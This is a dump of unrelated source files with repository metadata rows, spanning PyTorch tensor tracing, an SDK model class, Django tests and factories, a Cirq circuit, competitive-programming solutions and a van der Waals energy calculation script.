@staticmethod
def summary_bwd(*args, **kwargs):
total_data_size = FeatureMapsTracer.get_total_size(list(FeatureMapsTracer.bwd_tensors_registry))
print('TOTAL BACKWARD GRAD BLOBS SIZE: {} {}B'.format(*pretty_size(total_data_size)))
@staticmethod
def list_tensors(x):
tensors = []
if isinstance(x, (list, tuple)):
for i in x:
tensors.extend(FeatureMapsTracer.list_tensors(i))
elif isinstance(x, dict):
for i in x.values():
tensors.extend(FeatureMapsTracer.list_tensors(i))
elif isinstance(x, torch.Tensor):
tensors.append(x)
return tensors
@staticmethod
def get_shapes(tensors):
shapes = [x.shape for x in tensors]
return shapes
@staticmethod
def shapes_to_str(shapes):
return '[' + ', '.join([pretty_shape(shape) for shape in shapes]) + ']'
@staticmethod
def get_total_size(tensors):
total_size = 0
for x in tensors:
total_size += int(x.numel() * x.element_size())
return total_size
@staticmethod
def forward(module, inputs, outputs, verbose=False):
input_tensors = FeatureMapsTracer.list_tensors(inputs)
inputs_shapes = FeatureMapsTracer.get_shapes(input_tensors)
inputs_shapes_str = FeatureMapsTracer.shapes_to_str(inputs_shapes)
inputs_size = FeatureMapsTracer.get_total_size(input_tensors)
FeatureMapsTracer.fwd_tensors_registry.update(set(input_tensors))
output_tensors = FeatureMapsTracer.list_tensors(outputs)
outputs_shapes = FeatureMapsTracer.get_shapes(output_tensors)
outputs_shapes_str = FeatureMapsTracer.shapes_to_str(outputs_shapes)
outputs_size = FeatureMapsTracer.get_total_size(output_tensors)
FeatureMapsTracer.fwd_tensors_registry.update(set(output_tensors))
if verbose:
print('fwd {:>20}: {:>15} {:>15} {:>15} {:>15}'.format(module._get_name(),
pretty_size(inputs_size, units='M')[0],
inputs_shapes_str,
pretty_size(outputs_size, units='M')[0],
outputs_shapes_str))
@staticmethod
def backward(module, inputs, outputs, verbose=False):
input_tensors = FeatureMapsTracer.list_tensors(inputs)
inputs_shapes = FeatureMapsTracer.get_shapes(input_tensors)
inputs_shapes_str = FeatureMapsTracer.shapes_to_str(inputs_shapes)
inputs_size = FeatureMapsTracer.get_total_size(input_tensors)
FeatureMapsTracer.bwd_tensors_registry.update(set(input_tensors))
output_tensors = FeatureMapsTracer.list_tensors(outputs)
outputs_shapes = FeatureMapsTracer.get_shapes(output_tensors)
outputs_shapes_str = FeatureMapsTracer.shapes_to_str(outputs_shapes)
outputs_size = FeatureMapsTracer.get_total_size(output_tensors)
FeatureMapsTracer.bwd_tensors_registry.update(set(output_tensors))
if verbose:
print('bwd {:>20}: {:>15} {:>15} {:>15} {:>15}'.format(module._get_name(),
pretty_size(inputs_size, units='M')[0],
inputs_shapes_str,
pretty_size(outputs_size, units='M')[0],
outputs_shapes_str))
@staticmethod
def add_fwd_hooks(module):
def register_per_layer_hooks(m):
m.register_forward_hook(FeatureMapsTracer.forward)
module.register_forward_pre_hook(FeatureMapsTracer.reset)
module.apply(register_per_layer_hooks)
@staticmethod
def add_bwd_hooks(module):
def register_per_layer_hooks(m):
m.register_backward_hook(FeatureMapsTracer.backward)
module.apply(register_per_layer_hooks)
@staticmethod
def add_hooks(module):
FeatureMapsTracer.add_fwd_hooks(module)
FeatureMapsTracer.add_bwd_hooks(module)
class PerformanceCounters(object):
def __init__(self):
self.pc = {}
def update(self, pc):
for layer, stats in pc.items():
if layer not in self.pc:
self.pc[layer] = dict(layer_type=stats['layer_type'],
exec_type=stats['exec_type'],
status=stats['status'],
real_time=stats['real_time'],
calls=1)
else:
self.pc[layer]['real_time'] += stats['real_time']
self.pc[layer]['calls'] += 1
def print(self):
print('Performance counters:')
print(' '.join(['name', 'layer_type', 'exec_type', 'status', 'real_time(us)']))
for layer, stats in self.pc.items():
print('{} {} {} {} {}'.format(layer, stats['layer_type'], stats['exec_type'],
stats['status'], stats['real_time'] / stats['calls']))
| [
"[email protected]"
] | |
c7d144b8335a423d324ebdc6e7a74ee5f11d99ad | 665455c521cc7cf76c5436337ed545de90976af4 | /cohesity_management_sdk/models/node_port.py | 0160cdc36722ac0df6ecf9ed7e2a96895d226b7a | [
"Apache-2.0"
] | permissive | hsantoyo2/management-sdk-python | d226273bc8eedcf9220ea4999a6f0b9a1a30d99c | 0093194d125fc6746f55b8499da1270c64f473fc | refs/heads/master | 2023-03-01T06:09:39.644085 | 2021-01-15T08:23:16 | 2021-01-15T08:23:16 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,851 | py | # -*- coding: utf-8 -*-
# Copyright 2020 Cohesity Inc.
class NodePort(object):
"""Implementation of the 'NodePort' model.
VmInfo specifies information of a NodePort per service and port
combination within an application instance.
Attributes:
is_ui_port (bool): TODO: type description here.
port (int): TODO: type description here.
tag (TagEnum): Specifies use of the nodeport kDefault - No specific
service. kHttp - HTTP server. kHttps - Secure HTTP server. kSsh -
Secure shell server.
"""
# Create a mapping from Model property names to API property names
_names = {
"is_ui_port":'isUiPort',
"port":'port',
"tag":'tag'
}
def __init__(self,
is_ui_port=None,
port=None,
tag=None):
"""Constructor for the NodePort class"""
# Initialize members of the class
self.is_ui_port = is_ui_port
self.port = port
self.tag = tag
@classmethod
def from_dictionary(cls,
dictionary):
"""Creates an instance of this model from a dictionary
Args:
dictionary (dictionary): A dictionary representation of the object as
obtained from the deserialization of the server's response. The keys
MUST match property names in the API description.
Returns:
object: An instance of this structure class.
"""
if dictionary is None:
return None
# Extract variables from the dictionary
is_ui_port = dictionary.get('isUiPort')
port = dictionary.get('port')
tag = dictionary.get('tag')
# Return an object of this model
return cls(is_ui_port,
port,
tag)
| [
"[email protected]"
] | |
8cc261eb0ecfb093323305bc3cc656d8b5205b78 | a6c13fb257563d99c45f79b2fee5c2f2f76251ef | /apps/common/factories.py | 197597ddc5ded9aea5a8f9bfe7315a01f742e943 | [] | no_license | sipanmargaryan/addproduct | 9999cdf9b611ea4f103ed9e58e24c8fc8fe0e3fb | 9232c31956f154f3c4349fe3942a331559213c70 | refs/heads/master | 2022-11-05T19:23:37.209482 | 2020-06-26T14:44:45 | 2020-06-26T14:44:45 | 275,178,682 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 800 | py | import factory
from django.utils import timezone
import common.models
class ArticleFactory(factory.DjangoModelFactory):
title = factory.Sequence(lambda n: 'help text title-{}'.format(n))
description = factory.Sequence(lambda n: 'help text description-{}'.format(n))
class Meta:
model = common.models.Article
class CategoryFactory(factory.DjangoModelFactory):
name = factory.Sequence(lambda n: 'category-{}'.format(n))
class Meta:
model = common.models.Category
class ServiceFactory(factory.DjangoModelFactory):
opening_time = factory.lazy_attribute(lambda x: timezone.now())
closing_time = factory.lazy_attribute(lambda x: timezone.now())
category = factory.SubFactory(CategoryFactory)
class Meta:
model = common.models.Service
| [
"[email protected]"
] | |
d765931611ffb0b15f7c1c88acfd00e0ac6f9f19 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_145/669.py | bd702b9e219525f76c3fa85711b680bca73aa591 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 688 | py | #!/usr/bin/env python
import sys
import struct
import ctypes
def binary(num):
return ''.join(bin(ord(c)).replace('0b', '').rjust(8, '0') for c in struct.pack('!f', num))
T = int(sys.stdin.readline())
for case in range(0, T):
part = sys.stdin.readline()
up, down = part.split("/")
up = int(up)
down = int(down)
if int(bin(up&down)[2:]) != 0:
print "Case #%s: impossible" % (str(case+1) )
else:
for i in range(1, 40):
up = 2*up
if up >= down:
print "Case #%s: %d" % (str(case+1), i )
break
| [
"[email protected]"
] | |
559e9d1a9a1c37ba4f8aae45a6b1828a164fe7ce | b685036280331fa50fcd87f269521342ec1b437b | /src/tests/demo_5.py | c5de86e214fd5babcc1639e86f60c6ee47de9df4 | [] | no_license | chenqing666/myML_DM_Test | f875cb5b2a92e81bc3de2a0070c0185b7eacac89 | 5ac38f7872d94ca7cedd4f5057bb93732b5edbad | refs/heads/master | 2022-02-26T01:52:06.293025 | 2019-09-20T06:35:25 | 2019-09-20T06:35:25 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 175 | py |
def fib(times):
n = 0
a,b = 0, 1
while n < times:
yield b
a, b = b, a + b
n += 1
return "done"
g = fib(2)
next(g)
next(g)
# next(g) | [
"[email protected]"
] | |
bd74a3ab41b48ffe8069d7327a2c0494179fcbfe | fcde32709c62b8ee86da459bb7c8eee52c848118 | /code/day03/r4.py | 37ad4deb38ed39591d4c123e94a810e47614be79 | [] | no_license | klaus2015/py_base | 6b92d362c3d7dc0e09205a037f4d580381dac94d | ec32c731c1c2f6a0dab87f1d167397e4fa86b8de | refs/heads/master | 2022-07-28T15:49:30.383648 | 2020-05-11T15:31:43 | 2020-05-11T15:31:43 | 261,777,278 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 716 | py | # state = None
# number = int(input("请输入一个整数: "))
# if number % 2 :
# state = "奇数"
# else:
# state = "偶数"
# print(state)
# state = "奇数" if int(input("请输入整数: ")) % 2 else "偶数"
# print(state)
year = int(input("请输入年份:"))
result = year % 4 == 0 and year % 100 != 0 or year % 400 == 0
if result:
day = 29
else:
day = 28
print(day)
代码简单,但是可读性差 能被4整除但是不能被100整除,或者可以被400整除
day = 29 if not year % 4 and year % 100 or not year % 400 else 28
day = 29 if year % 4 == 0 and year % 100 != 0 or year % 400 == 0 else 28
result = year % 4
print(result)
year = 2000
result = year % 4
print(result) | [
"[email protected]"
] | |
a4b9d93d338391843fa18a38fd30a88d04acb569 | e0ede722874d222a789411070f76b50026bbe3d8 | /practice/solution/0894_all_possible_full_binary_trees.py | 2727423a40a633641a8545b0f9ac6da90888a70d | [] | no_license | kesarb/leetcode-summary-python | cd67456cb57bdff7ee227dab3930aaf9c2a6ad00 | dc45210cb2cc50bfefd8c21c865e6ee2163a022a | refs/heads/master | 2023-05-26T06:07:25.943854 | 2021-06-06T20:02:13 | 2021-06-06T20:02:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,031 | py | # Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, val=0, left=None, right=None):
# self.val = val
# self.left = left
# self.right = right
class Solution(object):
def allPossibleFBT(self, N):
"""
:type N: int
:rtype: List[TreeNode]
"""
self.value_dict = {1: [TreeNode(0)]}
self.res = 0
self.res = self.dfs(N)
return self.res
def dfs(self, N):
temp_list = []
if N in self.value_dict:
temp_list = self.value_dict[N]
return temp_list
for i in range(1, N, 2):
for left in self.dfs(i):
for right in self.dfs(N - 1 - i):
root = TreeNode(0)
root.left = left
root.right = right
temp_list.append(root)
self.value_dict[N] = temp_list
return temp_list | [
"[email protected]"
] | |
b67726927a44da27cddb100768d5532598314c80 | 038af1bfd275530413a7b4e28bf0e40eddf632c6 | /parsifal/apps/accounts/tests/test_update_emails_view.py | 6e3b2e07623eb93ac58bb135d2b97b941ee0e58f | [
"MIT"
] | permissive | vitorfs/parsifal | 5c5345ff75b48c5596977c8e0a9c4c537ed4726c | 68c3ce3623a210a9c649a27f9d21ae6130541ea9 | refs/heads/dev | 2023-05-24T16:34:31.899776 | 2022-08-14T16:30:06 | 2022-08-14T16:30:06 | 11,648,402 | 410 | 223 | MIT | 2023-05-22T10:47:20 | 2013-07-25T00:27:21 | Python | UTF-8 | Python | false | false | 2,130 | py | from django.test.testcases import TestCase
from django.urls import reverse
from parsifal.apps.authentication.tests.factories import UserFactory
from parsifal.utils.test import login_redirect_url
class TestUpdateEmailsViewView(TestCase):
@classmethod
def setUpTestData(cls):
cls.user = UserFactory(email="[email protected]")
cls.url = reverse("settings:emails")
def test_login_required(self):
response = self.client.get(self.url)
self.assertRedirects(response, login_redirect_url(self.url))
def test_get_success(self):
self.client.force_login(self.user)
response = self.client.get(self.url)
with self.subTest(msg="Test get status code"):
self.assertEqual(200, response.status_code)
parts = ("csrfmiddlewaretoken", "email", "[email protected]")
for part in parts:
with self.subTest(msg="Test response body", part=part):
self.assertContains(response, part)
def test_post_success(self):
data = {
"email": "[email protected]",
}
self.client.force_login(self.user)
response = self.client.post(self.url, data, follow=True)
with self.subTest(msg="Test post status code"):
self.assertEqual(302, response.redirect_chain[0][1])
with self.subTest(msg="Test post redirect status code"):
self.assertEqual(200, response.status_code)
with self.subTest(msg="Test success message"):
self.assertContains(response, "Account email was updated with success!")
with self.subTest(msg="Test form saved data"):
self.assertContains(response, 'value="[email protected]"')
def test_post_fail(self):
data = {"email": "invalidemail"}
self.client.force_login(self.user)
response = self.client.post(self.url, data)
with self.subTest(msg="Test post status code"):
self.assertEqual(200, response.status_code)
with self.subTest(msg="Test error message"):
self.assertContains(response, "Enter a valid email address.")
| [
"[email protected]"
] | |
b9fd420ff9cb37198ef9d9d480d07225dc750a1b | 839d8d7ccfa54d046e22e31a2c6e86a520ee0fb5 | /icore/base/list/dict_test.py | b6745b165a751dc40e63e211eac910f10f6e658e | [] | no_license | Erich6917/python_corepython | 7b584dda737ef914780decca5dd401aa33328af5 | 0176c9be2684b838cf9613db40a45af213fa20d1 | refs/heads/master | 2023-02-11T12:46:31.789212 | 2021-01-05T06:21:24 | 2021-01-05T06:21:24 | 102,881,831 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 222 | py | # -*- coding: utf-8 -*-
# @Time : 2017/12/26
# @Author : LIYUAN134
# @File : dict_test.py
# @Commment:
#
import dict as dict
def test1():
# dict.dict_mulkeys()
dict.dict_cal()
test1()
| [
"[email protected]"
] | |
387a2c4e876cb2a1a446a27a40b003870afa741b | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /data/cirq_new/cirq_program/startCirq_noisy175.py | cc4f8f2ea5639c20ee3b44f313ca868e0ad2a42c | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,957 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 5/15/20 4:49 PM
# @File : grover.py
# qubit number=4
# total number=14
import cirq
import cirq.google as cg
from typing import Optional
import sys
from math import log2
import numpy as np
#thatsNoCode
def make_circuit(n: int, input_qubit):
c = cirq.Circuit() # circuit begin
c.append(cirq.H.on(input_qubit[0])) # number=1
c.append(cirq.H.on(input_qubit[1])) # number=2
c.append(cirq.H.on(input_qubit[2])) # number=3
c.append(cirq.H.on(input_qubit[3])) # number=4
c.append(cirq.SWAP.on(input_qubit[1],input_qubit[0])) # number=5
c.append(cirq.SWAP.on(input_qubit[1],input_qubit[0])) # number=6
c.append(cirq.H.on(input_qubit[0])) # number=11
c.append(cirq.CZ.on(input_qubit[3],input_qubit[0])) # number=12
c.append(cirq.H.on(input_qubit[0])) # number=13
c.append(cirq.CNOT.on(input_qubit[3],input_qubit[0])) # number=8
c.append(cirq.X.on(input_qubit[0])) # number=9
c.append(cirq.X.on(input_qubit[0])) # number=10
# circuit end
c.append(cirq.measure(*input_qubit, key='result'))
return c
def bitstring(bits):
return ''.join(str(int(b)) for b in bits)
if __name__ == '__main__':
qubit_count = 4
input_qubits = [cirq.GridQubit(i, 0) for i in range(qubit_count)]
circuit = make_circuit(qubit_count,input_qubits)
circuit = cg.optimized_for_sycamore(circuit, optimizer_type='sqrt_iswap')
circuit_sample_count =2000
circuit = circuit.with_noise(cirq.depolarize(p=0.01))
simulator = cirq.Simulator()
result = simulator.run(circuit, repetitions=circuit_sample_count)
frequencies = result.histogram(key='result', fold_func=bitstring)
writefile = open("../data/startCirq_noisy175.csv","w+")
print(format(frequencies),file=writefile)
print("results end", file=writefile)
print(circuit.__len__(), file=writefile)
print(circuit,file=writefile)
writefile.close() | [
"[email protected]"
] | |
099e40f30702743bcd8c7b03996405b18971a5e5 | 84297380d00453e71f65c591dca046bd41a32184 | /ABC/ABC113/A.py | c367158a2dbe77733d419a9117215295220f221d | [] | no_license | daiki1998/atcoder | a5ef25245b1bbc3a5e33044846a3c16213603bd3 | d864a7cb11e41dbf6a691f5d128fdfe122b07046 | refs/heads/main | 2023-03-06T22:55:29.863716 | 2021-02-18T12:01:24 | 2021-02-18T12:01:24 | 323,401,954 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 46 | py | x, y = map(int, input().split())
print(x+y//2) | [
"[email protected]"
] | |
2f53b3f8271b60d22df54f72752eded981080e61 | b697f5d8e441328c2deee1bb5853d80710ae9873 | /617.合并二叉树.py | 5d35a8098ff5d6b1d6488a23bbd84ef8e3088d55 | [] | no_license | happy-luck/LeetCode-python | d06b0f6cf7bad4754e96e6a160e3a8fc495c0f95 | 63fc5a1f6e903a901ba799e77a2ee9df2b05543a | refs/heads/master | 2021-03-22T16:12:52.097329 | 2020-07-15T13:48:37 | 2020-07-15T13:48:37 | 247,381,313 | 0 | 0 | null | 2020-03-15T01:47:42 | 2020-03-15T01:28:38 | null | UTF-8 | Python | false | false | 2,281 | py | 方法一:递归
我们可以对这两棵树同时进行前序遍历,并将对应的节点进行合并。在遍历时,如果两棵树的当前节点均不为空,我们就将它们的值进行相加,并对它们的左孩子和右孩子进行递归合并;如果其中有一棵树为空,那么我们返回另一颗树作为结果;如果两棵树均为空,此时返回任意一棵树均可(因为都是空)。
class Solution:
def mergeTrees(self, t1: TreeNode, t2: TreeNode) -> TreeNode:
if t2==None:
return t1
if t1==None:
return t2
t1.val += t2.val
t1.left = self.mergeTrees(t1.left,t2.left)
t1.right = self.mergeTrees(t1.right,t2.right)
return t1
时间复杂度:O(N),其中 N 是两棵树中节点个数的较小值。
空间复杂度:O(N),在最坏情况下,会递归 N 层,需要 O(N) 的栈空间。
方法二:迭代
我们首先把两棵树的根节点入栈,栈中的每个元素都会存放两个根节点,并且栈顶的元素表示当前需要处理的节点。在迭代的每一步中,我们取出栈顶的元素并把它移出栈,并将它们的值相加。随后我们分别考虑这两个节点的左孩子和右孩子,如果两个节点都有左孩子,那么就将左孩子入栈;如果只有一个节点有左孩子,那么将其作为第一个节点的左孩子;如果都没有左孩子,那么不用做任何事情。对于右孩子同理。
class Solution:
def mergeTrees(self, t1: TreeNode, t2: TreeNode) -> TreeNode:
if t2==None:
return t1
if t1==None:
return t2
stack = [(t1,t2)]
while stack:
t = stack.pop(0)
if t[1]==None:
continue
t[0].val += t[1].val
if(t[0].left==None):
t[0].left = t[1].left
else:
stack.append((t[0].left,t[1].left))
if(t[0].right==None):
t[0].right = t[1].right
else:
stack.append((t[0].right,t[1].right))
return t1
时间复杂度:O(N),其中 N 是两棵树中节点个数的较小值。
空间复杂度:O(N),在最坏情况下,栈中会存放 N 个节点。
| [
"[email protected]"
] | |
d90dcbcb06450d0cec154190b117b2ccce514085 | bce41eff7da75522f58d831251e1ed95d8809585 | /services/web/project/apps/event/subscriptions/eventUpdateSubscription.py | 88e5ae15e2e558fd56fb9935803408b5065f7dcb | [] | no_license | javillarreal/eventuality | be9728a19caef8c19d3d40e6dd5b90e57b5b63a1 | 5a543a9e6b5a3f014b670297e22f52a9884af4bb | refs/heads/master | 2021-07-03T18:55:33.037863 | 2021-06-24T03:24:38 | 2021-06-24T03:24:38 | 204,239,198 | 1 | 0 | null | 2020-11-27T02:39:19 | 2019-08-25T03:05:17 | Python | UTF-8 | Python | false | false | 696 | py | import random
import graphene
from rx import Observable
class RandomType(graphene.ObjectType):
seconds = graphene.Int()
random_int = graphene.Int()
class Subscription(graphene.ObjectType):
count_seconds = graphene.Int(up_to=graphene.Int())
random_int = graphene.Field(RandomType)
def resolve_count_seconds(root, info, up_to=5):
return Observable.interval(1000)\
.map(lambda i: "{0}".format(i))\
.take_while(lambda i: int(i) <= up_to)
def resolve_random_int(root, info):
return Observable.interval(1000).map(lambda i: RandomType(seconds=i, random_int=random.randint(0, 500)))
| [
"[email protected]"
] | |
c87f6abacd4d1526c188c591e69870c485175606 | f67e9154c3e077eaad349f85439d88820098a6fc | /Search/017_LetterCombOfPhoneNum.py | 73ba53f513b92e34b6a16b00c4aef98076aeab44 | [] | no_license | pondjames007/CodingPractice | 0c159ae528d1e595df0f0a901ee1ab4dd8925a14 | fb53fea229ac5a4d5ebce23216afaf7dc7214014 | refs/heads/master | 2020-06-08T02:31:04.569375 | 2020-01-15T20:41:34 | 2020-01-15T20:41:34 | 193,142,129 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 873 | py | # TIPS:
# make a dictionary to map digit and char
# go through all digits and find out all combinations
class Solution:
def letterCombinations(self, digits: str) -> List[str]:
if not digits: return []
n_to_c = {}
char = [*string.ascii_lowercase]
start = 0
end = 0
for i in range(2,10):
start = end
if i == 7 or i == 9:
end += 4
else:
end += 3
n_to_c[i] = char[start:end]
ans = []
self.lookup(n_to_c, digits, [], ans)
return ans
def lookup(self, dic, digits, path, ans):
if not digits:
ans.append(''.join(path))
return
for c in dic[int(digits[0])]:
self.lookup(dic, digits[1:], path + [c], ans) | [
"[email protected]"
] | |
abe0955e886d8fbc9de7f3e7ad550af81be6cedb | 5a07828016e8bafbea5dac8f83c8bfd5d0bfd603 | /py_290w290/140304_srw_output.py | 94f032f09c22370f14899c0b9c40b25777fbe84a | [] | no_license | JJHopkins/rajter_compare | db5b88d2c6c1efc0fead9b6ed40fb3cce36bedb4 | 2ba52f4f16cf2aca350a82ea58d0aa8f8866c47c | refs/heads/master | 2020-06-04T23:53:57.089329 | 2014-04-08T18:02:30 | 2014-04-08T18:02:30 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,695 | py | #$ {\bf Free energy between two skewed cylinders (CG-10 in water). Full retarded result, function of separation $\ell$ and angle $\theta$} \\
#$ Equation 12: $G(\ell,\theta) = - \frac{ (\pi R_1^{2})(\pi R_2^{2}) }{2 \pi~\ell^{4} \sin{\theta}} \left( {\cal A}^{(0)}(\ell) + {\cal A}^{(2)}(\ell) \cos 2\theta \right)$ \\
#$ $G(\ell,\theta) = - \frac{k_BT}{64 \pi} \frac{ \pi^2 R_1^{2} R_2^{2} }{\ell^{4} \sin{\theta}} {\sum_{n=0}^{\infty}}' \Delta_{1,\parallel} \Delta_{2,\parallel} ~p_n^{4} ~\int_0^{\infty} t dt ~\frac{e^{- 2 p_n \sqrt{t^{2} + 1}}}{(t^{2} + 1)} \tilde g(t, a_1(i \omega_n), a_2(i \omega_n), \theta),$ \\
#$ with $\tilde g(t, a_1, a_2, \theta) &=& 2 \left[ (1+3a_1)(1+3a_2) t^{4} + 2 (1+2a_1+2a_2+3a_1a_2) t^{2} + 2(1+a_1)(1+a_2)\right] + \nonumber \\
#$ & & ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + (1-a_1)(1-a_2)(t^{2} + 2)^2 \cos 2\theta.$ \\
#!/usr/bin/python
import numpy as np
import scipy.optimize as opt
from scipy.integrate import trapz
import matplotlib.pyplot as pl
from matplotlib import axis as ax
# use pyreport -l file.py
from pylab import show
from matplotlib.ticker import MultipleLocator
from mpl_toolkits.mplot3d import Axes3D
from pylab import pause
from matplotlib.backends.backend_pdf import PdfPages
pp = PdfPages('plots/skew_ret_water/skew_ret_water.pdf')
eiz_x = np.loadtxt('data/eiz_x_output_eV.txt') #perpendicular, radial
eiz_y = np.loadtxt('data/eiz_y_output_eV.txt')
eiz_z = np.loadtxt('data/eiz_z_output_eV.txt') # parallel,axial
#eiz_w = 1.0 + np.zeros(len(eiz_z))
eiz_w = np.loadtxt('data/eiz_w_output_eV.txt') # water as intervening medium
eiz_w[0] = eiz_w[1] #NOTE: there is a jump from first val down to second val
r_1 = 1.0e-9
r_2 = 1.0e-9
c = 2.99e8 # in m/s
T = 297
kb = 1.3807e-23 # in J/K
coeff = 2.411e14 # in rad/s
# NOTES:
# at RT, 1 kT = 4.11e-21 J
# 1 eV = 1.602e-19 J = 0.016 zJ
# h_bar_eV = 6.5821e-16 eVs
# h_bar = 1. #1.0546e-34 #in Js
#kb = 8.6173e-5 # in eV/K
# z_n_eV = (2*pi*kT/h_bar)n
# = (0.159 eV) / (6.5821e-16 eVs)
# = n*2.411e14 rad/s
# z_n_J = (2*pi*kT/h_bar)n
# = (1.3807e-23 J/K) / (1.0546e-34 Js))*n
# = n*2.411e14 rad/s
#coeff = 0.159 # in eV w/o 1/h_bar
ns = np.arange(0.,500.)
z = ns * coeff
ls = np.linspace(1.0e-9, 1.0e-6, 200)
#thetas = np.linspace((0.01)*np.pi,(1./2)*np.pi,25)
thetas = [np.pi/8,np.pi/4,np.pi/3,np.pi/2]
dt = 1.0
ts = np.arange(1.0,10000.,dt)
def Aiz(perp, par,med):
return (2.0*(perp-med)*med)/((perp+med)*(par-med))
def ys(a,time,eizw,L, N):
term0 = ( time / (time*time+1.0) )
term1 = ( time**4 * 2.0*(1. + 3.*a)*(1.+3.*a) )
term2 = ( time**2 * 4.0*(1. + 2.0*a+2.0*a+3.0*a*a))
term3 = ( 4.0*(1. + a)*(1.0 + a) )
term4 = (-2.0 * np.sqrt(eizw)* L * coeff * N / c * np.sqrt(time*time + 1.0))
#print 'ys term0', term0
#print 'ys term1', term1
#print 'ys term2', term2
#print 'ys term3', term3
#print 'ys term4', term4
#print '----'
return (term0) * np.exp(term4)*( (term1) + (term2) + (term3))#* term5
def y_2s(a,time,eizw, L, N):
term0 = (time / (time*time+1.0) )
term1 = ((1.- a)*(1.- a)*(time * time + 2.0)*(time * time + 2.0))
term2 = (-2.0 * np.sqrt(eizw)* L * coeff * N / c * np.sqrt(time*time + 1.0))
#print 'y_2s term0', term0
#print 'y_2s term1', term1
#print 'y_2s term2', term2
#print '----'
return term0 * term1* np.exp(term2) #* term3
def As(eizz,eizw,L,N,Y):
term1 = (((eizz-eizw)/eizw)*((eizz-eizw)/eizw))
term2 = (Y * eizw *eizw * (coeff*N)**4 * L**4 / (c**4))
#term3 = Y
#print 'As term1 = ', term1
#print 'As term2 = ', term2
##print 'As term3 = ', term3
#print '----'
return term1 * term2# * term3
def A_2s(eizz,eizw, L , N ,Y):
term1 = (((eizz-eizw)/eizw)*((eizz-eizw)/eizw))
term2 = (Y * eizw *eizw * (coeff*N)**4 * L**4 / (c**4))
#term3 = Y
#print 'A_2s term1 = ', term1
#print 'A_2s term2 = ', term2
##print 'A_2s term3 = ', term3
#print '----'
return (term1 * term2)# * term3
y = np.zeros(shape=(len(ns),len(ls)))
y_2 = np.zeros(shape=(len(ns),len(ls)))
A = np.zeros(shape=(len(ns),len(ls)))
A_2 = np.zeros(shape=(len(ns),len(ls)))
EL = np.zeros(len(ls))
G_l_t_dt = np.zeros(shape=(len(ls),len(thetas)))
aiz = []
aiz = Aiz(eiz_x,eiz_z, eiz_w) # of length = len(ns)
for k,length in enumerate(ls):
sum_A = np.empty(len(ls))
sum_A_2 = np.empty(len(ls))
for j,n in enumerate(ns):
# Integral:
y[j,k] = trapz(ys(aiz[j],ts,eiz_w[j],length,n),ts,dt)
y_2[j,k] = trapz(y_2s(aiz[j],ts,eiz_w[j],length,n),ts,dt)
#print 'dt Integral y = ',i,k,j, y
#print 'dt Integral y_2 = ',i,k,j, y_2
#print '----'
#print 'N terms for A0 = ' , As(eiz_z[j],eiz_w[j],length,n,y)
#print 'N terms for A2 = ', A_2s(eiz_z[j],eiz_w[j],length,n,y_2)
#print '----'
A[j,k] = As(eiz_z[j],eiz_w[j],length,n,y[j,k])
A_2[j,k] = A_2s(eiz_z[j],eiz_w[j],length,n,y_2[j,k])# * np.cos(2.0*theta)
A[0] = (1./2)*A[0]
A_2[0] = (1./2)*A_2[0]
sum_A = np.sum(A,axis=0)
#print 'sum of A0 = ', k,j,sum_A
sum_A_2 = np.sum(A_2,axis=0)
#print 'sum of A2 = ', k,j,sum_A_2
#print '----'
#print 'shape sum_A_2 = ', np.shape(sum_A_2)
#sys.exit()
for k,length in enumerate(ls):
for i, theta in enumerate(thetas):
EL[k] = 1./(length*length*length*length)
G_l_t_dt[k,i] = (1.602e-19 / 4.11e-21) * (1./32) * EL[k]*np.pi*r_1*r_1*r_2*r_2*(sum_A[k] + sum_A_2[k]* np.cos(2.0*theta) )/(2.0*np.sin(theta))# (1e21)*
np.savetxt('compare/srw_min_thetas.txt',G_l_t_dt)
pl.figure()
pl.loglog(ls,(kb*T/32)*sum_A,'b-', label = r'$\mathcal{A^{(0)}}$')
pl.loglog(ls,(kb*T/32)*sum_A_2,'b--', label = r'$\mathcal{A^{(2)}}$')
pl.xlabel(r'$\mathrm{separation}\,\ell\,\,\,\rm{[m]}$', size = 20)
pl.ylabel(r'$\mathrm{\mathcal{A^{(0)},\,\,A^{(2)}}}$', size = 20)
#pl.title(r'$\mathrm{Hamaker \, coeff.s \,:\,skewed,\,retarded,\,water}$', size = 20)
pl.legend(loc = 'upper right')
pl.axis([1e-9,1e-6,1e-24,1e-19])
pl.savefig('plots/skew_ret_water/skew_ret_water_A0_A2.pdf')
show()
ls4 = 1e9*ls[ 2]#2]
ls5 = 1e9*ls[12]#4]
ls6 = 1e9*ls[22]#6]
ls1 = 1e9*ls[32]#8]
ls2 = 1e9*ls[42]#12]
ls3 = 1e9*ls[52]#16]
fig = pl.figure()
ax = fig.add_axes([0.1,0.1,0.8,0.8])
#pl.semilogy(thetas, G_l_t_dt)
ax.semilogy(thetas, G_l_t_dt[ 2,:], label = r'$\ell$ = %1.2f nm' %ls4)
ax.semilogy(thetas, G_l_t_dt[12,:], label = r'$\ell$ = %1.2f nm' %ls5)
